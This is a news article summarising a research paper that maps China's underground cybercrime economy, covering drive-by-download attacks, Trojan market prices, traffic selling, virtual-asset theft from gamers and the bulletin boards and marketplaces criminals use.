Researchers map China's underground cybercrime economy

Researchers from Peking University in Beijing and the University of Mannheim in Germany released a paper that aims to map the underground cybercrime economy in China.
Written by Larry Dignan, Contributor on

Researchers from Peking University in Beijing and the University of Mannheim in Germany released a paper this week that aims to map the underground cybercrime economy in China.

The paper concludes that 1.49 percent of the 145,000 most popular sites in China “contain some kind of malicious content.”

While the Internet boom in China is impressive, the researchers note that “there is also the other side of the coin: targeting the virtual assets owned by the normal Chinese Internet users, malicious attackers, so called blackhats, discover the Web as a new venue for making money by exploiting innocent users.”

The researchers outline the most common attack:
"A common theme is to inject malicious code into a bought or cracked Web site. The injected code exploits an unpatched client-side vulnerability within the visiting Web-browser or related application. Each time a user with a vulnerable version of a browser or related application visits this site, his machine is compromised and some kind of malware is automatically installed. This kind of attack is also called drive-by-download attack. The malware is quite often some kind of Trojan Horse that searches for valuable information on the victim’s machine and then sends the information back to the attacker, who in turn can sell this virtual good to other attackers or innocent users.”

Meanwhile, anti-virus software simply cannot keep up with these threats, according to researchers.

More interesting, however, is the paper’s attempt to map China’s underground hacking economy and identify the key players. These players are not specific to China per se, but are worth noting.

A few takeaways from the report:

  • “The market price of a Trojan is between tens to thousands Renminbi (RMB), and a package of 0-day powerful Trojan generator and evasion service can be up to several ten thousands RMB. 10 RMB is as of November 2007 equivalent to US$1.34 dollar.”
  • “The administrators of certain personal Web sites attract visitors with the help of free goodies, e.g., free movies, music, software, or tools. These Web sites often betray their visitors: they sell the traffic (i.e., Web site visits) of their Web sites to Envelopes Stealers (people that buy traffic and malware) by hosting the Web-based Trojans. This means that innocent Web site visitors are redirected via these malicious Web sites to other sites that then attack the victims. If the attack is successful, a piece of malware is installed on the victim’s machine.” The going rate: 40 to 60 RMB per 10,000 IP visits.
  • Gamers are the linchpin of China’s underground economy. These folks are the victims of virtual asset theft–powers in games and virtual money. Without their demand, hackers would not have much to sell.
  • Bulletin boards are the communications tool of choice. Specifically, Baidu’s bulletin board is popular with hackers. “One of the most prominent places for such markets within China is the Baidu Post Bar, the largest bulletin board community in China but with weak administration. Advertisements can be commonly found on several pertinent post bars at the site post.baidu.com. This system has a keyword-based structure, and there are no other entries to the post bar: if you do not know the keyword to search for, you will not find any malicious entries. The actors within the black market have their own, unique jargon, and thus it is hard for an outsider to find any information about this threat. The actual trading of virtual assets happens on public market places like Taobao. These very common online business platforms within the WWW are used by the cyber criminals to advertise and sell their goods. After a trade was successful and a Player has bought a virtual good, the money is sent commonly via Alipay.”

This article was originally a blog post on ZDNet.com.

Editorial standards